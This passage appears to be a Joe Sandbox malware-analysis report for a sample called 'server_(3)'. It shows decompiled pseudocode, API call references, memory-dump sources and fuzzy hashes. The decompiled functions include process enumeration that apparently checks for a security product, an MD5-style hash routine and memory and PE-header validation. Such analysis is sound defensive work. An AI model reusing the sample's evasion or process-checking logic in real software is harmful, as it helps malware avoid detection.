          /* -------- */					goto L59;
          /* 005e1fd6 */				}
          /* 005e1fc5 */			}
          /* 005e1f2d */		}
          /* 005e1f21 */	}
          			}

          APIs
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1E2F
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1E61
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1E93
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1EC5
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1EF7
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1F29
          • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 005E2028
          • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 005E203C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeHeap
          • String ID: Uqt
          • API String ID: 3298025750-2320327147
          • Opcode ID: ee1d2a4a3f341f7814fccbfe692c699c8dacd8f6ceccde03962051ff6d86aaeb
          • Instruction ID: 707ec25ce9b0caff8a59aa2249d9e04bebd86961644d81ccbdd1a28855783e1a
          • Opcode Fuzzy Hash: ee1d2a4a3f341f7814fccbfe692c699c8dacd8f6ceccde03962051ff6d86aaeb
          • Instruction Fuzzy Hash: 2381AD70A00AC4ABC718DBB68DC8D5F7EBEBB987007240D25F581DB214EA35ED489765
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 68%
          			E005E30D5() {
          				char _v264;
          				void* _v300;
          				int _t8;
          				intOrPtr _t9;
          				int _t15;
          				void* _t17;
          
          				_t15 = 0;
          				_t17 = CreateToolhelp32Snapshot(2, 0);
          				if(_t17 != 0) {
          					_t8 = Process32First(_t17,  &_v300);
          					while(_t8 != 0) {
          						_t9 =  *0x5ea348; // 0x25dd5a8
          						_t2 = _t9 + 0x5ebe88; // 0x73617661
          						_push( &_v264);
          						if( *0x5ea12c() != 0) {
          							_t15 = 1;
          						} else {
          							_t8 = Process32Next(_t17,  &_v300);
          							continue;
          						}
          						L7:
          						CloseHandle(_t17);
          						goto L8;
          					}
          					goto L7;
          				}
          				L8:
          				return _t15;
          			}

          0x005e30e0
          0x005e30ea
          0x005e30ee
          0x005e30f8
          0x005e3129
          0x005e30ff
          0x005e3104
          0x005e3111
          0x005e311a
          0x005e3131
          0x005e311c
          0x005e3124
          0x00000000
          0x005e3124
          0x005e3132
          0x005e3133
          0x00000000
          0x005e3133
          0x00000000
          0x005e312d
          0x005e3139
          0x005e313e

          APIs
          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005E30E5
          • Process32First.KERNEL32(00000000,?), ref: 005E30F8
          • Process32Next.KERNEL32(00000000,?), ref: 005E3124
          • CloseHandle.KERNEL32(00000000), ref: 005E3133
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
          • String ID: |}^
          • API String ID: 420147892-3035116398
          • Opcode ID: 8a3260b822fcfe468816a7bdccd7ae35da91586d9b8031c4962d0e7da5b8fc5f
          • Instruction ID: 4c5f1bddf9a003fecdb7296a3081cdde1c23197c631027b0cfb45e1be4d7ffe8
          • Opcode Fuzzy Hash: 8a3260b822fcfe468816a7bdccd7ae35da91586d9b8031c4962d0e7da5b8fc5f
          • Instruction Fuzzy Hash: FFF096325001E45AD72CA7779C4DEEB3AACFFD5350F010065FAC5C3001EA20DB49D6A2
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00401D68() {
          				void* _t1;
          				unsigned int _t3;
          				void* _t4;
          				long _t5;
          				void* _t6;
          				intOrPtr _t10;
          				void* _t14;
          
          				_t10 =  *0x404170;
          				_t1 = CreateEventA(0, 1, 0, 0);
          				 *0x40417c = _t1;
          				if(_t1 == 0) {
          					return GetLastError();
          				}
          				_t3 = GetVersion();
          				if(_t3 != 5) {
          					L4:
          					if(_t14 <= 0) {
          						_t4 = 0x32;
          						return _t4;
          					} else {
          						goto L5;
          					}
          				} else {
          					if(_t3 >> 8 > 0) {
          						L5:
          						 *0x40416c = _t3;
          						_t5 = GetCurrentProcessId();
          						 *0x404168 = _t5;
          						 *0x404170 = _t10;
          						_t6 = OpenProcess(0x10047a, 0, _t5);
          						 *0x404164 = _t6;
          						if(_t6 == 0) {
          							 *0x404164 =  *0x404164 | 0xffffffff;
          						}
          						return 0;
          					} else {
          						_t14 = _t3 - _t3;
          						goto L4;
          					}
          				}
          			}

          0x00401d69
          0x00401d77
          0x00401d7d
          0x00401d84
          0x00401ddb
          0x00401ddb
          0x00401d86
          0x00401d8e
          0x00401d9b
          0x00401d9b
          0x00401dd7
          0x00401dd9
          0x00000000
          0x00000000
          0x00000000
          0x00401d90
          0x00401d97
          0x00401d9d
          0x00401d9d
          0x00401da2
          0x00401db0
          0x00401db5
          0x00401dbb
          0x00401dc1
          0x00401dc8
          0x00401dca
          0x00401dca
          0x00401dd4
          0x00401d99
          0x00401d99
          0x00000000
          0x00401d99
          0x00401d97

          APIs
          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
          • GetVersion.KERNEL32 ref: 00401D86
          • GetCurrentProcessId.KERNEL32 ref: 00401DA2
          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: Process$CreateCurrentEventOpenVersion
          • String ID:
          • API String ID: 845504543-0
          • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
          • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
          • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
          • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: .$GetProcAddress.$l
          • API String ID: 0-2784972518
          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
          • Instruction ID: 98e2855c91b7d6d13c1aaee1a987c8e3c3f73c4769feff650d4183344e91fb74
          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
          • Instruction Fuzzy Hash: DC3159B6900609DFDB10CF99C884BAEBBF9FF48324F24504AD841A7351D771EA45CBA4
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 49%
          			E005E16DF(void* __ecx, void* _a4) {
          				signed int _v8;
          				signed int _v12;
          				intOrPtr _v16;
          				intOrPtr _v20;
          				intOrPtr _v24;
          				intOrPtr _v28;
          				intOrPtr _v32;
          				intOrPtr _v36;
          				intOrPtr _v40;
          				intOrPtr _v44;
          				intOrPtr _v48;
          				intOrPtr _v52;
          				intOrPtr _v56;
          				intOrPtr _v60;
          				intOrPtr _v64;
          				intOrPtr _v68;
          				intOrPtr _v72;
          				void _v76;
          				intOrPtr* _t226;
          				signed int _t229;
          				signed int _t231;
          				signed int _t233;
          				signed int _t235;
          				signed int _t237;
          				signed int _t239;
          				signed int _t241;
          				signed int _t243;
          				signed int _t245;
          				signed int _t247;
          				signed int _t249;
          				signed int _t251;
          				signed int _t253;
          				signed int _t255;
          				signed int _t257;
          				signed int _t259;
          				signed int _t338;
          				signed char* _t348;
          				signed int _t349;
          				signed int _t351;
          				signed int _t353;
          				signed int _t355;
          				signed int _t357;
          				signed int _t359;
          				signed int _t361;
          				signed int _t363;
          				signed int _t365;
          				signed int _t367;
          				signed int _t376;
          				signed int _t378;
          				signed int _t380;
          				signed int _t382;
          				signed int _t384;
          				intOrPtr* _t400;
          				signed int* _t401;
          				signed int _t402;
          				signed int _t404;
          				signed int _t406;
          				signed int _t408;
          				signed int _t410;
          				signed int _t412;
          				signed int _t414;
          				signed int _t416;
          				signed int _t418;
          				signed int _t420;
          				signed int _t422;
          				signed int _t424;
          				signed int _t432;
          				signed int _t434;
          				signed int _t436;
          				signed int _t438;
          				signed int _t440;
          				signed int _t508;
          				signed int _t599;
          				signed int _t607;
          				signed int _t613;
          				signed int _t679;
          				void* _t682;
          				signed int _t683;
          				signed int _t685;
          				signed int _t690;
          				signed int _t692;
          				signed int _t697;
          				signed int _t699;
          				signed int _t718;
          				signed int _t720;
          				signed int _t722;
          				signed int _t724;
          				signed int _t726;
          				signed int _t728;
          				signed int _t734;
          				signed int _t740;
          				signed int _t742;
          				signed int _t744;
          				signed int _t746;
          				signed int _t748;
          
          				_t1 =  &_a4; // 0x5e544b
          				_t226 =  *_t1;
          				_t348 = __ecx + 2;
          				_t401 =  &_v76;
          				_t682 = 0x10;
          				do {
          					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
          					_t401 =  &(_t401[1]);
          					_t348 =  &(_t348[4]);
          					_t682 = _t682 - 1;
          				} while (_t682 != 0);
          				_t683 =  *(_t226 + 4);
          				_t402 =  *(_t226 + 8);
          				_t349 =  *(_t226 + 0xc);
          				asm("rol eax, 0x7");
          				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
          				asm("rol ecx, 0xc");
          				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
          				asm("ror edx, 0xf");
          				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
          				asm("ror esi, 0xa");
          				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
          				_v8 = _t685;
          				_t690 = _v8;
          				asm("rol eax, 0x7");
          				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
          				asm("rol ecx, 0xc");
          				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
          				asm("ror edx, 0xf");
          				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
          				asm("ror esi, 0xa");
          				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
          				_v8 = _t692;
          				_t697 = _v8;
          				asm("rol eax, 0x7");
          				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
          				asm("rol ecx, 0xc");
          				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
          				asm("ror edx, 0xf");
          				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
          				asm("ror esi, 0xa");
          				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
          				_v8 = _t699;
          				asm("rol eax, 0x7");
          				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
          				asm("rol ecx, 0xc");
          				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
          				_t508 =  !_t357;
          				asm("ror edx, 0xf");
          				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
          				_v12 = _t410;
          				_v12 =  !_v12;
          				asm("ror esi, 0xa");
          				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
          				asm("rol eax, 0x5");
          				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
          				asm("rol ecx, 0x9");
          				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
          				asm("rol edx, 0xe");
          				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
          				asm("ror esi, 0xc");
          				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
          				asm("rol eax, 0x5");
          				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
          				asm("rol ecx, 0x9");
          				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
          				asm("rol edx, 0xe");
          				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
          				asm("ror esi, 0xc");
          				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
          				asm("rol eax, 0x5");
          				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
          				asm("rol ecx, 0x9");
          				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
          				asm("rol edx, 0xe");
          				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
          				asm("ror esi, 0xc");
          				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
          				asm("rol eax, 0x5");
          				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
          				asm("rol ecx, 0x9");
          				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
          				asm("rol edx, 0xe");
          				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
          				asm("ror esi, 0xc");
          				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
          				asm("rol eax, 0x4");
          				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
          				asm("rol ecx, 0xb");
          				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
          				asm("rol edx, 0x10");
          				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
          				_t599 = _t367 ^ _t420;
          				asm("ror esi, 0x9");
          				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
          				asm("rol eax, 0x4");
          				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
          				asm("rol edi, 0xb");
          				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
          				asm("rol edx, 0x10");
          				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
          				_t338 = _t607 ^ _t422;
          				asm("ror ecx, 0x9");
          				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
          				asm("rol eax, 0x4");
          				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
          				asm("rol esi, 0xb");
          				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
          				asm("rol edi, 0x10");
          				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
          				_t424 = _t734 ^ _t613;
          				asm("ror ecx, 0x9");
          				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
          				asm("rol eax, 0x4");
          				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
          				asm("rol edx, 0xb");
          				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
          				asm("rol esi, 0x10");
          				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
          				asm("ror ecx, 0x9");
          				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
          				asm("rol eax, 0x6");
          				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
          				asm("rol edx, 0xa");
          				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
          				asm("rol esi, 0xf");
          				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
          				asm("ror ecx, 0xb");
          				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
          				asm("rol eax, 0x6");
          				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
          				asm("rol edx, 0xa");
          				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
          				asm("rol esi, 0xf");
          				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
          				asm("ror ecx, 0xb");
          				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
          				asm("rol eax, 0x6");
          				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
          				asm("rol edx, 0xa");
          				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
          				asm("rol esi, 0xf");
          				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
          				asm("ror edi, 0xb");
          				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
          				asm("rol eax, 0x6");
          				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
          				asm("rol edx, 0xa");
          				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
          				_t400 = _a4;
          				asm("rol esi, 0xf");
          				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
          				 *_t400 =  *_t400 + _t259;
          				asm("ror eax, 0xb");
          				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
          				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
          				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
          				return memset( &_v76, 0, 0x40);
          			}

          0x005e16e2
          0x005e16e2
          0x005e16ed
          0x005e16f0
          0x005e16f3
          0x005e16f4
          0x005e1712
          0x005e1714
          0x005e1717
          0x005e171a
          0x005e171a
          0x005e171d
          0x005e1720
          0x005e1723
          0x005e1740
          0x005e1743
          0x005e1759
          0x005e175c
          0x005e1776
          0x005e1779
          0x005e178f
          0x005e1792
          0x005e1794
          0x005e17ac
          0x005e17af
          0x005e17b2
          0x005e17ca
          0x005e17cd
          0x005e17e7
          0x005e17ea
          0x005e1800
          0x005e1803
          0x005e1805
          0x005e181d
          0x005e1822
          0x005e1825
          0x005e183b
          0x005e183e
          0x005e1858
          0x005e185b
          0x005e1871
          0x005e1874
          0x005e1876
          0x005e1891
          0x005e1894
          0x005e18ab
          0x005e18ae
          0x005e18b2
          0x005e18cb
          0x005e18ce
          0x005e18d0
          0x005e18d3
          0x005e18ee
          0x005e18f1
          0x005e190a
          0x005e190d
          0x005e191d
          0x005e1920
          0x005e1938
          0x005e193b
          0x005e1955
          0x005e1958
          0x005e1970
          0x005e1973
          0x005e1989
          0x005e198c
          0x005e19a4
          0x005e19a7
          0x005e19bf
          0x005e19c2
          0x005e19dc
          0x005e19df
          0x005e19f5
          0x005e19f8
          0x005e1a10
          0x005e1a13
          0x005e1a2d
          0x005e1a30
          0x005e1a48
          0x005e1a4b
          0x005e1a61
          0x005e1a64
          0x005e1a7c
          0x005e1a7f
          0x005e1a97
          0x005e1a9a
          0x005e1aac
          0x005e1aaf
          0x005e1ac1
          0x005e1ac4
          0x005e1ad6
          0x005e1ad9
          0x005e1add
          0x005e1aed
          0x005e1af0
          0x005e1afe
          0x005e1b01
          0x005e1b13
          0x005e1b16
          0x005e1b2a
          0x005e1b2d
          0x005e1b2f
          0x005e1b3f
          0x005e1b42
          0x005e1b54
          0x005e1b57
          0x005e1b65
          0x005e1b68
          0x005e1b7a
          0x005e1b7d
          0x005e1b81
          0x005e1b91
          0x005e1b94
          0x005e1ba6
          0x005e1ba9
          0x005e1bb7
          0x005e1bba
          0x005e1bcc
          0x005e1bcf
          0x005e1be1
          0x005e1be4
          0x005e1bf8
          0x005e1bfb
          0x005e1c0f
          0x005e1c12
          0x005e1c26
          0x005e1c29
          0x005e1c3d
          0x005e1c40
          0x005e1c54
          0x005e1c57
          0x005e1c6b
          0x005e1c70
          0x005e1c82
          0x005e1c85
          0x005e1c99
          0x005e1c9c
          0x005e1cb0
          0x005e1cb3
          0x005e1cc9
          0x005e1ccc
          0x005e1ce0
          0x005e1ce3
          0x005e1cf5
          0x005e1cf8
          0x005e1d0c
          0x005e1d0f
          0x005e1d23
          0x005e1d26
          0x005e1d3a
          0x005e1d43
          0x005e1d46
          0x005e1d4f
          0x005e1d58
          0x005e1d60
          0x005e1d68
          0x005e1d72
          0x005e1d87

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: memset
          • String ID: KT^
          • API String ID: 2221118986-3515506576
          • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
          • Instruction ID: 62c042aeefe34926a8bbac29518cab92c380afa2b0b92ddb310d00847ed4ce99
          • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
          • Instruction Fuzzy Hash: 0A22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E8551(long _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				signed int _v16;
          				short* _v32;
          				void _v36;
          				void* _t57;
          				signed int _t58;
          				signed int _t61;
          				signed int _t62;
          				void* _t63;
          				signed int* _t68;
          				intOrPtr* _t69;
          				intOrPtr* _t71;
          				intOrPtr _t72;
          				intOrPtr _t75;
          				void* _t76;
          				signed int _t77;
          				void* _t78;
          				void _t80;
          				signed int _t81;
          				signed int _t84;
          				signed int _t86;
          				short* _t87;
          				void* _t89;
          				signed int* _t90;
          				long _t91;
          				signed int _t93;
          				signed int _t94;
          				signed int _t100;
          				signed int _t102;
          				void* _t104;
          				long _t108;
          				signed int _t110;
          
          				_t108 = _a4;
          				_t76 =  *(_t108 + 8);
          				if((_t76 & 0x00000003) != 0) {
          					L3:
          					return 0;
          				}
          				_a4 =  *[fs:0x4];
          				_v8 =  *[fs:0x8];
          				if(_t76 < _v8 || _t76 >= _a4) {
          					_t102 =  *(_t108 + 0xc);
          					__eflags = _t102 - 0xffffffff;
          					if(_t102 != 0xffffffff) {
          						_t91 = 0;
          						__eflags = 0;
          						_a4 = 0;
          						_t57 = _t76;
          						do {
          							_t80 =  *_t57;
          							__eflags = _t80 - 0xffffffff;
          							if(_t80 == 0xffffffff) {
          								goto L9;
          							}
          							__eflags = _t80 - _t91;
          							if(_t80 >= _t91) {
          								L20:
          								_t63 = 0;
          								L60:
          								return _t63;
          							}
          							L9:
          							__eflags =  *(_t57 + 4);
          							if( *(_t57 + 4) != 0) {
          								_t12 =  &_a4;
          								 *_t12 = _a4 + 1;
          								__eflags =  *_t12;
          							}
          							_t91 = _t91 + 1;
          							_t57 = _t57 + 0xc;
          							__eflags = _t91 - _t102;
          						} while (_t91 <= _t102);
          						__eflags = _a4;
          						if(_a4 == 0) {
          							L15:
          							_t81 =  *0x5ea380; // 0x0
          							_t110 = _t76 & 0xfffff000;
          							_t58 = 0;
          							__eflags = _t81;
          							if(_t81 <= 0) {
          								L18:
          								_t104 = _t102 | 0xffffffff;
          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
          								__eflags = _t61;
          								if(_t61 < 0) {
          									_t62 = 0;
          									__eflags = 0;
          								} else {
          									_t62 = _a4;
          								}
          								__eflags = _t62;
          								if(_t62 == 0) {
          									L59:
          									_t63 = _t104;
          									goto L60;
          								} else {
          									__eflags = _v12 - 0x1000000;
          									if(_v12 != 0x1000000) {
          										goto L59;
          									}
          									__eflags = _v16 & 0x000000cc;
          									if((_v16 & 0x000000cc) == 0) {
          										L46:
          										_t63 = 1;
          										 *0x5ea3c8 = 1;
          										__eflags =  *0x5ea3c8;
          										if( *0x5ea3c8 != 0) {
          											goto L60;
          										}
          										_t84 =  *0x5ea380; // 0x0
          										__eflags = _t84;
          										_t93 = _t84;
          										if(_t84 <= 0) {
          											L51:
          											__eflags = _t93;
          											if(_t93 != 0) {
          												L58:
          												 *0x5ea3c8 = 0;
          												goto L5;
          											}
          											_t77 = 0xf;
          											__eflags = _t84 - _t77;
          											if(_t84 <= _t77) {
          												_t77 = _t84;
          											}
          											_t94 = 0;
          											__eflags = _t77;
          											if(_t77 < 0) {
          												L56:
          												__eflags = _t84 - 0x10;
          												if(_t84 < 0x10) {
          													_t86 = _t84 + 1;
          													__eflags = _t86;
          													 *0x5ea380 = _t86;
          												}
          												goto L58;
          											} else {
          												do {
          													_t68 = 0x5ea388 + _t94 * 4;
          													_t94 = _t94 + 1;
          													__eflags = _t94 - _t77;
          													 *_t68 = _t110;
          													_t110 =  *_t68;
          												} while (_t94 <= _t77);
          												goto L56;
          											}
          										}
          										_t69 = 0x5ea384 + _t84 * 4;
          										while(1) {
          											__eflags =  *_t69 - _t110;
          											if( *_t69 == _t110) {
          												goto L51;
          											}
          											_t93 = _t93 - 1;
          											_t69 = _t69 - 4;
          											__eflags = _t93;
          											if(_t93 > 0) {
          												continue;
          											}
          											goto L51;
          										}
          										goto L51;
          									}
          									_t87 = _v32;
          									__eflags =  *_t87 - 0x5a4d;
          									if( *_t87 != 0x5a4d) {
          										goto L59;
          									}
          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
          									__eflags =  *_t71 - 0x4550;
          									if( *_t71 != 0x4550) {
          										goto L59;
          									}
